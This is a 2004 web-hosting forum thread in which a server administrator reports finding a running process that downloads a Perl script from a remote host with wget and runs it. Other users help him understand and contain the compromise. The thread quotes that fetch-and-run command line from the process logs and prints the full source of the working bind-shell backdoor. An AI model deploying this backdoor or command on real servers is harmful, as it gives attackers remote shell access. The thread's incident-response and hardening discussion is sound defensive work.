The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

hacked ???? www.uhagr.org

Discussion in 'General Discussion' started by bidouilleur, Apr 18, 2004.

  1. bidouilleur

    bidouilleur Well-Known Member

    Joined:
    Apr 27, 2003
    Messages:
    46
    Likes Received:
    0
    Trophy Points:
    6
    while looking over some thing on a server I came across this line....


    nobody 32749 0.0 0.0 2100 972 ? S Apr17 0:00 sh -c cd /tmp ; wget http://geocities.yahoo.com.br/wzrdrox/bd.txt ; perl bd.txt 2001


    I go to that URl and found :

    #!/usr/bin/perl

    ##############################################
    # Simple backdoor by UHAGr coded by ghostian #
    # usage: ./UHAGr-bd.pl <port> (default 75000)#
    # On shell ls = ls; etc. #
    # www.uhagr.org #
    ##############################################


    use IO::Socket;


    $msg = "echo ::[UHAGr] Yeah! ::-";
    $port = ($ARGV[0]);
    $shell = "/bin/sh";

    if (!$port) { $port="75000"; }

    $local = IO::Socket::INET->new(Proto=>"tcp", LocalPort=>"$port",
    Listen=>"1") or die "Port allready in use \n";

    print "
    ##############################################
    # Simple backdoor by UHAGr coded by ghostian #
    # usage: ./UHAGr-bd.pl <port> (default 75000)#
    # On shell ls = ls; etc. #
    # www.uhagr.org #
    ##############################################
    ";



    while (accept(remote, $local)) {

    open(STDIN, ">&remote");
    open(STDOUT, ">&remote");
    open(STDERR, ">kick");

    system($msg);
    system($shell);

    close(STDERR);
    close(STDIN);
    close(STDOUT);
    system("rm kick");

    }


    at http://www.uhagr.org/ I find some tools to exploit servers etc...

    I do think we have some kinda backdoor open on this server, I'm no expert at all, so reason I come and ask here what it does, what sys admin could do to close this and where to find the file or how to find it....
    my feeling, it is used to open relay to spam, personal opinion....
    or am I completely wrong ???

    thanks a lot for your help in this matter
     
  2. noc32

    noc32 Member

    Joined:
    Feb 28, 2004
    Messages:
    20
    Likes Received:
    0
    Trophy Points:
    1
    This will get that perl script and will launch it. That will provide the hacker with a shell on port 2001 as seems from the command launched.
     
  3. laura

    laura Active Member

    Joined:
    Sep 12, 2003
    Messages:
    35
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    indonesia
    Hi Noc32
    How you clean your server after that?
     
  4. noc32

    noc32 Member

    Joined:
    Feb 28, 2004
    Messages:
    20
    Likes Received:
    0
    Trophy Points:
    1
    how do you clean the server? good question indeed... because what it was presented here is just a backdoor to the system and god knows what that hacker brought to the system. The system will have to be scanned for:
    - rookits
    - other backdoors
    - for modified binaries (like ps, ls... )

    If you're not used to this it's advised to hire a professional to do this or you could always make a full backup and do an OS restore.
     
  5. bidouilleur

    bidouilleur Well-Known Member

    Joined:
    Apr 27, 2003
    Messages:
    46
    Likes Received:
    0
    Trophy Points:
    6
    we ran a rootkit and it showed nothing really special

    we have a firewall and except the standard port needed to run normal services all is closed, we monitor the iptables log and nope, no trace of any traffic nor intrucion ( better break out try)

    I killed the services that lead me to this and they didn't re start even after a reboot.....

    reason we have it hard to trace it. We keep a close watch on the server.... hope we can trace it one day.....

    no unusual traffic....
     
  6. eth00

    eth00 Well-Known Member
    PartnerNOC

    Joined:
    Mar 30, 2003
    Messages:
    723
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    NC
    cPanel Access Level:
    Root Administrator
    I played around with that for awhile and it seems like the way it was started and all it was just a temporary shell. Now though that he might have been able to hack your server but it looks like you stayed safe. Once loaded he would have tried to acess it but your firewall blocked port 2001 which is what saved you I think.

    Still keep a close eye on it, but looks like you should be fine.
     
  7. damainman

    damainman Well-Known Member

    Joined:
    Nov 13, 2003
    Messages:
    515
    Likes Received:
    0
    Trophy Points:
    16
    where did u find that line?

    Is there anyway to report that user to yahoo??
     
    #7 damainman, Apr 22, 2004
    Last edited: Apr 22, 2004
  8. eth00

    eth00 Well-Known Member
    PartnerNOC

    Joined:
    Mar 30, 2003
    Messages:
    723
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    NC
    cPanel Access Level:
    Root Administrator
    The line was in ps -aux, or atleast it could be seen there. All isps have an abuse department, just look on their main website or do a whois on the domain.
     
  9. bidouilleur

    bidouilleur Well-Known Member

    Joined:
    Apr 27, 2003
    Messages:
    46
    Likes Received:
    0
    Trophy Points:
    6
    have a little file ona small account that i can call via the browser with

    print "Content-type: text/html\n\n";
    print "<html><h1>System Report</h1></html>\n";
    print "<br>\n<br>\n<br>\n";
    print "System UPTIME response : ";
    print `uptime`;
    print "\n<br>System UNAME response : ";
    print `uname -a`;
    print "\n<br>System WHO response : ";
    print `who`;
    print "\n<br>System ps -auwx response : <pre>\n";
    print `ps -auwx`;
    print "\n</pre>";

    it gives you general info on the server and you see a lot in there

    this is how I saw these lines

    nobody 4442 0.0 0.0 5052 476 ? S 19:24 0:00 sh -c cd /tmp ; wget http://geocities.yahoo.com.br/wzrdrox/bd.txt ; perl bd.txt 2001
    nobody 4444 0.0 0.1 6824 1324 ? S 19:24 0:00 perl bd.txt 2001


    and it came back, trying to dig again, found 3 bd.txt in /tmp this time, didn't kill anything yet since the ports are closed but am trying to find out now where they come from, there must be something creatint these files, in the file you see the script from post one that you also can see on the site

    wondering if there is something else i should delete or not.......
     
  10. noc32

    noc32 Member

    Joined:
    Feb 28, 2004
    Messages:
    20
    Likes Received:
    0
    Trophy Points:
    1
  11. woolly

    woolly Active Member

    Joined:
    Dec 29, 2003
    Messages:
    26
    Likes Received:
    0
    Trophy Points:
    1
    you should really secure your tmp directory.

    put /tmp and /var/tmp into a seperate partition and then make it non-executable.
     
  12. r00t316

    r00t316 Active Member

    Joined:
    Nov 29, 2003
    Messages:
    34
    Likes Received:
    0
    Trophy Points:
    6
    just because /tmp or /var/tmp is not executable doesn't mean you can not execute perl scripts or the like

    perl /tmp/bleh.pl

    will still work.
    Why?
    Because perl is actually doing the executing and it is only parsing /tmp/bleh.pl

    At any rate.
    You need to install phpsuexec and suexec.

    Someone did php injection on 1 of your customers sites.
    Now because you do not have phpsuexec installed you can not tell who actually has the vulnerable software.
    And you now probably have someone logging into your server as nobody which is really bad.
    If you run phpsuexec if they do get a backdoor they are only going to be the user of that site.
    then you can look at the files in /tmp and see the user.
    Look for his domain and then check /usr/local/apache/domlogs
    Then look through their domain log file and you can see what was actually called and how they did it.
    I also recommend running iptables.
    Block everything inbound and only allow certain ports .
    80 21,22, 53 , 443, 2086 etc etc
    then that backdoor won't work because you did not specify in the iptable rule that port 2001 is allowed inbound traffic.

    You should really mount /tmp is a seperate partition however.
    It turns away some people not being able to execute from it.
    Most people use perl now to use backdoors because everyone has perl installed.

    Also you should check /dev/shm <-- new tmp for glibc2
    you can umount that it isn't needed.
    umount /dev/shm and you probably want to add that to a startup file so it un mounts it at every boot.

    before you do that ls -la /dev/shm
    make sure noone already put files in it to hack you.

    Once you get /tmp mounted as a seperate partition
    stop mysql
    rm -rf /var/tmp
    ln -s /tmp /var/tmp
    then you actually kill 2 /var/tmp from being executable.

    Hope this helps :P
     
  13. bmcpanel

    bmcpanel Well-Known Member

    Joined:
    Jun 1, 2002
    Messages:
    546
    Likes Received:
    0
    Trophy Points:
    16
    You are right. Securing /tmp is not fool-proof, but it will deter some would be hackers that would otherwise hack your box.
     
Loading...

Share This Page